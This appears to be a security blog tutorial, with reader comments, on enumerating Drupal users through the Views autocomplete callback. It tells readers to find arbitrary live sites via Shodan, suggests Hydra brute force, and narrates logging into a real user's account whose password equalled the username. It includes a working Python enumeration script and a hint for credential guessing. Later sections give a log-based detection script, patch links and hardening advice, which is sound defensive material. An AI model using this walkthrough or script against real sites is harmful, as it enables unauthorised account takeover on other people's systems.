As everybody knows, Drupal "is a free and open-source content management framework (CMF) written in PHP and distributed under the GNU General Public License. It is used as a back-end system for at least 2.1% of all websites worldwide ranging from personal blogs to corporate, political, and government sites... It is also used for knowledge management and business collaboration."
First of all, we need to find a Drupal installation. We are going to use Shodan with the following query:
After you've selected one of them, we are going to look for all the users on the website. Check the following URL, which calls the user autocomplete callback exposed by the Views module:
http://URL/?q=admin/views/ajax/autocomplete/user/e
The response lists every user whose username contains "e". Because the match is "contains" rather than "starts with", walking the alphabet one character at a time recovers the whole user list, and no login is needed to do it.
Then we go to the login page at http://URL/user/login and try to log in as some of these users. You could brute-force it from BackTrack with Hydra, for example; in this case we'll try manually.
Well, we are lucky: we are in Ecopol's profile! In this case the username and the password were the same.
And... can we add, edit or remove content on this Drupal website? Let's see...
Seems that if...
If you want, you can use a script included in BackTrack called DPScan.py to get a list of every user on the Drupal website.
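The enumeration walk described above, automated, as an added example that is not part of the original post and is not DPScan.py: it requests the Views autocomplete path once per character, merges the JSON responses and deduplicates. The response shape (a JSON object keyed by username), the sample user list and the http://URL placeholder are assumptions; the transport is injected so the logic runs offline here.

```python
"""Walk the Views user-autocomplete callback to enumerate Drupal accounts.

Assumed (not taken from the original post): the callback answers with a
JSON object keyed by username, e.g. {"admin":"admin","ecopol":"ecopol"}.
A JSON list of names is accepted as well. Transport is injected so the
logic can be exercised offline against constructed responses.
"""
import json
import string
import urllib.parse
import urllib.request

# Same path the post uses, with the search prefix appended at the end.
AUTOCOMPLETE_PATH = "/?q=admin/views/ajax/autocomplete/user/"


def parse_autocomplete(body):
    """Return the set of usernames found in one autocomplete response body.

    Anything that is not JSON (an HTML error page, an empty body once the
    callback is protected) yields an empty set instead of raising.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return set()
    if isinstance(data, dict):
        return {str(name) for name in data}
    if isinstance(data, list):
        return {name for name in data if isinstance(name, str)}
    return set()


def http_fetch(base_url, prefix, timeout=10):
    """Real transport: GET <base_url>/?q=admin/views/ajax/autocomplete/user/<prefix>."""
    url = base_url.rstrip("/") + AUTOCOMPLETE_PATH + urllib.parse.quote(prefix, safe="")
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_users(base_url, fetch, alphabet=string.ascii_lowercase + string.digits):
    """Query once per alphabet character and merge everything that comes back.

    The post shows the callback matches 'contains', not 'starts with', so
    one pass over [a-z0-9] reaches every account whose name holds at least
    one of those characters.
    """
    found = set()
    for ch in alphabet:
        found |= parse_autocomplete(fetch(base_url, ch))
    return sorted(found)


# Constructed stand-in for a site's user table; not real data.
SAMPLE_USERS = ["admin", "ecopol", "editor1", "bob"]


def fake_fetch(base_url, prefix, timeout=10):
    """Offline transport imitating the 'contains' match over SAMPLE_USERS."""
    matches = {n: n for n in SAMPLE_USERS if prefix.lower() in n.lower()}
    return json.dumps(matches)


if __name__ == "__main__":
    # Swap fake_fetch for http_fetch to run it against a site you are authorised to test.
    for name in enumerate_users("http://URL", fake_fetch):
        print(name)
```

The same list feeds the login step: with the usernames in hand, a "password equals username" check like the one that worked above is one request per account rather than a guess.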
But we are on the right side, the Security Engineer or System Administrator side... What can we do? In this link you can get the patch...
The best option to avoid this will always be to enforce a complex password requirement...
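On the defender's side the patch is what closes the hole, but the request pattern of an alphabet walk is also easy to spot in the web server logs. The following is an added example, not code from the original post or from Drupal: it parses combined-format access log lines and flags any client that tries many distinct prefixes against the autocomplete path, which a real autocomplete widget (one person typing one name) does not do. The log lines are constructed for the demonstration and the threshold of five distinct prefixes is an assumption to tune per site.

```python
"""Flag alphabet walks against the Views user-autocomplete callback in web
server access logs (Apache/nginx combined format).

A real autocomplete widget sends a few prefixes that grow as one person
types ("e", "ec", "eco"); an enumeration script sends many unrelated single
characters. Counting distinct prefixes per client separates the two.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format: ip ident user [time] "method path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Matches both the ?q= form used in the post and the clean-URL form.
AUTOCOMPLETE_RE = re.compile(
    r'(?:\?q=|/)admin/views/ajax/autocomplete/user/(?P<prefix>[^/?&\s]*)'
)


def parse_line(line):
    """Split one access-log line into fields, or None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def autocomplete_prefix(path):
    """Return the decoded autocomplete prefix in a request path, or None."""
    m = AUTOCOMPLETE_RE.search(path)
    return unquote(m.group("prefix")) if m else None


def find_enumerators(lines, threshold=5):
    """Return {ip: [prefixes]} for clients that tried >= threshold distinct prefixes."""
    prefixes_by_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        prefix = autocomplete_prefix(rec["path"])
        if prefix is not None:
            prefixes_by_ip[rec["ip"]].add(prefix)
    return {ip: sorted(p) for ip, p in prefixes_by_ip.items() if len(p) >= threshold}


# Constructed sample log; addresses are documentation ranges, not real clients.
SAMPLE_LOG = """\
198.51.100.4 - - [10/Aug/2013:14:02:57 +0200] "GET /user/login HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Aug/2013:14:03:02 +0200] "GET /?q=admin/views/ajax/autocomplete/user/ad HTTP/1.1" 200 31 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Aug/2013:14:03:03 +0200] "GET /?q=admin/views/ajax/autocomplete/user/adm HTTP/1.1" 200 31 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2013:14:03:11 +0200] "GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1" 200 57 "-" "python-urllib/3.3"
203.0.113.7 - - [10/Aug/2013:14:03:11 +0200] "GET /?q=admin/views/ajax/autocomplete/user/b HTTP/1.1" 200 18 "-" "python-urllib/3.3"
203.0.113.7 - - [10/Aug/2013:14:03:12 +0200] "GET /?q=admin/views/ajax/autocomplete/user/c HTTP/1.1" 200 2 "-" "python-urllib/3.3"
203.0.113.7 - - [10/Aug/2013:14:03:12 +0200] "GET /admin/views/ajax/autocomplete/user/d HTTP/1.1" 200 2 "-" "python-urllib/3.3"
203.0.113.7 - - [10/Aug/2013:14:03:13 +0200] "GET /admin/views/ajax/autocomplete/user/e HTTP/1.1" 200 43 "-" "python-urllib/3.3"
203.0.113.7 - - [10/Aug/2013:14:03:13 +0200] "GET /admin/views/ajax/autocomplete/user/%C3%A9 HTTP/1.1" 200 2 "-" "python-urllib/3.3"
not a log line at all
"""


if __name__ == "__main__":
    for ip, prefixes in find_enumerators(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(prefixes)} distinct prefixes {prefixes}")
```

A hit on this rule is also a quick way to confirm whether the callback still answers unauthenticated requests after the Views update: if the flagged requests return a 200 with a non-trivial body, the patch is not in place.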
Is there any way to protect this using a directive like or something else?
Thanks
Hi!!!
Here you have the details about the patch: http://www.madirish.net/node/465
I published how to obtain all the users of a Drupal site automatically with an Nmap script. If you are interested in it, please visit the link below.
http://www.behindthefirewalls.com/2013/08/nmap-640-released-how-to-install-and.html
Thanks for your visit
Deciding upon a content management system is highly vital to your success. I love Drupal. After all, the most innovative sites, such as the White House, use Drupal, so I picked Drupal. For our hosting I like Pantheon, with features like Drush integration. What content management system do you like?
If I'm honest, I don't have a particular predilection for any of them... I can tell you about a lot of hackers who are hacking websites built with CMSs like Drupal, Joomla or WordPress. Also, a lot of security researchers are working hard to find new vulnerabilities in these CMSs because they are so widespread. In my opinion, it's a great idea to hire a good security guy to carry out a proper web security audit.
This issue has been addressed here: https://drupal.org/comment/6810554#comment-6810554
It's patched and committed, so upgrading the Views module or using a recent stable version of the module should be enough.
Drupal has an intricate permission system. Site builders don't always take enough care to make sure that all roles on the Drupal system are restricted enough. Even with the patch, if a site builder is careless enough to allow anonymous users access to view user profiles, this "security hole" will be open.